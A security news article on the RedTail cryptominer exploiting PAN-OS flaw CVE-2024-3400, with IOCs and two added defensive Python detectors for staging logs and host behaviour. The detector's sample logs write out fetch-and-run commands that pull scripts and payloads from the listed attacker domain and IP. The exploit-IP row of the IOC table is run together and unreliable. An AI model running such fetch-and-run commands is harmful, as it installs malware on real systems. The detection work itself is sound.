RedTail Cryptominer Exploiting Palo Alto Networks Firewall Zero-day Flaw
The RedTail cryptocurrency mining malware has been observed exploiting a critical zero-day vulnerability in Palo Alto Networks' firewall operating system, PAN-OS.
This vulnerability, tracked as CVE-2024-3400, has a CVSS rating of 10.0, indicating its severity. The flaw allows unauthenticated attackers to execute arbitrary code with root privileges on affected firewalls, posing a significant threat to organizations that rely on these devices for network security.
The exploitation chain begins with the attackers leveraging CVE-2024-3400 to gain unauthorized access to the firewall.
Once access is obtained, the attackers execute commands to retrieve and run a bash shell script from an external domain.
This script is responsible for downloading the RedTail payload, which is tailored to the compromised machine's CPU architecture.
The malware then begins its cryptomining operations, using the machine's resources to mine cryptocurrency.
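The staging chain just described (exploit, fetch a shell script from an external host, pipe it into a shell, pull down the payload) leaves a recognisable trace in command and network logs. The following triage script is an added example for this article, not code from Akamai, Palo Alto Networks or the article's author. The domain and IP addresses it matches are the unambiguous entries from the article's IOC table; the syslog-style lines, the hostname and the file names inside them are constructed for the example and do not come from a real device.

```python
"""Triage sample command/log lines for the RedTail staging chain: known
infrastructure from the article's IOC table plus a generic
"download a script and pipe it straight into a shell" pattern.

Added example; not code from Akamai, Palo Alto Networks or the author.
Log lines and the file names in them are constructed."""
import re
from typing import Dict, List, Optional

# Indicators copied from the article's IOC table (unambiguous entries only).
IOC_DOMAINS = {"proxies.identitynetwork.top"}
IOC_IPS = {
    "193.222.96.163", "94.156.79.60", "94.156.79.129",
    "185.216.70.138", "78.153.140.51",
}

# The article does not give the script name or URL, so nothing specific
# is matched here: only the fetch-then-execute shape of the staging step.
FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed syslog-style lines; not from a real device.
SAMPLE_LOGS = [
    "2024-04-16T10:01:02Z fw01 sh[1412]: uid=0 cmd='wget -q https://updates.example.net/list.txt -O /tmp/list.txt'",
    "2024-04-16T10:03:44Z fw01 sh[1499]: uid=0 cmd='curl -s http://proxies.identitynetwork.top/x.sh | bash'",
    "2024-04-16T10:03:51Z fw01 sh[1503]: uid=0 cmd='wget http://94.156.79.60/payload -O /tmp/.p && chmod +x /tmp/.p'",
    "2024-04-16T10:05:00Z fw01 sshd[1600]: Accepted publickey for admin from 10.0.0.5",
]


def analyze_line(line: str) -> List[str]:
    """Return the reasons a single line is suspicious (empty if none)."""
    reasons = []
    for domain in sorted(IOC_DOMAINS):
        if domain in line:
            reasons.append(f"ioc_domain:{domain}")
    for ip in IP_RE.findall(line):
        if ip in IOC_IPS:
            reasons.append(f"ioc_ip:{ip}")
    if FETCH_AND_RUN.search(line):
        reasons.append("fetch_and_run")
    return reasons


def severity(reasons: List[str]) -> Optional[str]:
    """Known infrastructure plus a pipe-to-shell fetch is the full staging
    step; either one alone still deserves a look."""
    has_ioc = any(r.startswith("ioc_") for r in reasons)
    has_exec = "fetch_and_run" in reasons
    if has_ioc and has_exec:
        return "critical"
    if has_ioc:
        return "high"
    if has_exec:
        return "medium"
    return None


def triage(lines: List[str]) -> List[Dict]:
    """Run every line through analyze_line and keep the ones that score."""
    findings = []
    for index, line in enumerate(lines):
        reasons = analyze_line(line)
        level = severity(reasons)
        if level:
            findings.append({"line": index, "severity": level, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f["severity"].upper(), "line", f["line"], ", ".join(f["reasons"]))
```

Run against the constructed sample, the script flags line 1 as critical (IOC domain plus pipe-to-shell) and line 2 as high (download from an IOC IP); the benign package fetch and the SSH login are left alone. Because the IOC addresses will rotate, the fetch-and-run pattern is the part worth keeping in a detection rule; the indicator sets are only as current as the report they came from.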
Advanced Techniques and Evasion
The latest iteration of RedTail incorporates several advanced techniques to evade detection and analysis.
According to Akamai's security researchers, the malware now includes new anti-analysis features, such as forking itself multiple times to hinder debugging and terminating any instances of the GNU Debugger (GDB) it encounters.
These enhancements make it harder for security professionals to analyze and mitigate the threat.
The malware's configuration has also been updated to include an encrypted mining configuration, which launches the embedded XMRig miner.
Notably, the latest version of RedTail does not contain a cryptocurrency wallet, suggesting that the threat actors have shifted to using private mining pools or pool proxies.
This change gives them greater control over mining outcomes despite the increased operational and financial costs of maintaining a private server.
RedTail's impact is not limited to Palo Alto Networks firewalls. The malware has also been observed exploiting other known vulnerabilities in various devices and software, including TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
This range of targets highlights the malware's versatility and the attackers' extensive knowledge of diverse systems.
RedTail was first documented in January 2024 by security researcher Patryk Machowiak, who identified its use in a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based systems.
Since then, the malware has evolved significantly. In March 2024, Barracuda Networks reported cyber attacks that leveraged flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install Mirai botnet variants and deploy RedTail.
The latest version, detected in April 2024, includes significant updates, such as the use of the RandomX algorithm for greater mining efficiency and changes to the operating system configuration to make use of larger memory blocks (hugepages), improving performance.
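Two of the behaviours described above are visible from the host itself: the miner forking itself repeatedly (the anti-debugging trick from the evasion section) and the operating-system change that reserves hugepages for RandomX. The following host-side heuristic is an added example for this article, not code from Akamai, Palo Alto Networks or the article's author. The ps-style process table, the process name `.rt` and the hugepages value are constructed; treating zero reserved hugepages as the firewall's baseline is an assumption made for the example.

```python
"""Host-side heuristics for two RedTail behaviours from the article:
a self-forking process tree and a raised vm.nr_hugepages allocation.

Added example; not code from Akamai, Palo Alto Networks or the author.
The process table, the name ".rt" and the hugepages value are
constructed; a baseline of zero hugepages is an assumption."""
from collections import defaultdict
from typing import Dict, List, Tuple

Proc = Tuple[int, int, str, float]   # (pid, ppid, comm, cpu_percent)

# Constructed snapshot of a compromised host (not real data).
SAMPLE_PROCS: List[Proc] = [
    (1, 0, "systemd", 0.0),
    (812, 1, "sshd", 0.1),
    (2101, 1, ".rt", 0.0),        # parent that forked the workers
    (2102, 2101, ".rt", 48.7),
    (2103, 2101, ".rt", 47.9),
    (2104, 2102, ".rt", 0.2),     # fork of a fork
    (2300, 812, "bash", 0.0),
]
SAMPLE_NR_HUGEPAGES = 1280        # constructed: vm.nr_hugepages after tampering
EXPECTED_NR_HUGEPAGES = 0         # assumption: appliance baseline


def fork_chains(procs: List[Proc], min_members: int = 3) -> List[Tuple[str, List[int]]]:
    """Executables with at least min_members live copies where every copy
    except the root was forked by another copy of the same executable."""
    groups: Dict[str, List[Tuple[int, int]]] = defaultdict(list)
    for pid, ppid, comm, _ in procs:
        groups[comm].append((pid, ppid))
    trees = []
    for comm, members in groups.items():
        if len(members) < min_members:
            continue
        pids = {pid for pid, _ in members}
        forked_by_sibling = sum(1 for _, ppid in members if ppid in pids)
        if forked_by_sibling >= len(members) - 1:
            trees.append((comm, sorted(pids)))
    return trees


def cpu_by_comm(procs: List[Proc]) -> Dict[str, float]:
    """Total CPU share per executable name, so a tree is judged as a whole."""
    totals: Dict[str, float] = defaultdict(float)
    for _, _, comm, cpu in procs:
        totals[comm] += cpu
    return dict(totals)


def assess_host(procs: List[Proc], nr_hugepages: int,
                expected: int = EXPECTED_NR_HUGEPAGES,
                cpu_threshold: float = 80.0) -> List[str]:
    """Return human-readable findings; an empty list means nothing tripped."""
    findings = []
    if nr_hugepages > expected:
        findings.append(f"hugepages: vm.nr_hugepages={nr_hugepages}, expected {expected}")
    cpu = cpu_by_comm(procs)
    for comm, pids in fork_chains(procs):
        note = f"self-forking tree: {comm} pids={pids}"
        if cpu.get(comm, 0.0) >= cpu_threshold:
            note += f" (combined cpu {cpu[comm]:.1f}%)"
        findings.append(note)
    return findings


if __name__ == "__main__":
    for line in assess_host(SAMPLE_PROCS, SAMPLE_NR_HUGEPAGES):
        print(line)
```

On the constructed snapshot this reports the raised `vm.nr_hugepages` value and the `.rt` tree of four processes burning close to a full core between them. The fork-tree rule is a triage signal, not proof: a legitimate master/worker service also forks copies of itself, so on a real host the rule needs an allowlist of expected services, and the hugepages check needs the appliance's true baseline rather than the zero assumed here.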
While Akamai has not attributed the RedTail malware to any particular group, the sophistication and resources required to operate a private cryptomining pool suggest the involvement of a nation-state-backed group.
The techniques the threat actors use mirror those used by North Korea's Lazarus Group, known for its for-profit hacking operations and cryptocurrency thefts.
The exploitation of CVE-2024-3400 by the RedTail cryptominer underscores the critical need for organizations to apply security patches and updates promptly.
IOCs
| Indicator type | Indicator value |
|---|---|
| Exploit-originating IP addresses | 92.118.39.120193.222.96.16379.110.62.2534.127.194.11192.18.157.25168.170.165.3694.74.75.19 |
| Malware hosting servers | 193.222.96.163, 94.156.79.60, 94.156.79.129, 185.216.70.138, 78.153.140.51 |
| Domains | proxies.identitynetwork.top |
Source credit: cybersecuritynews.com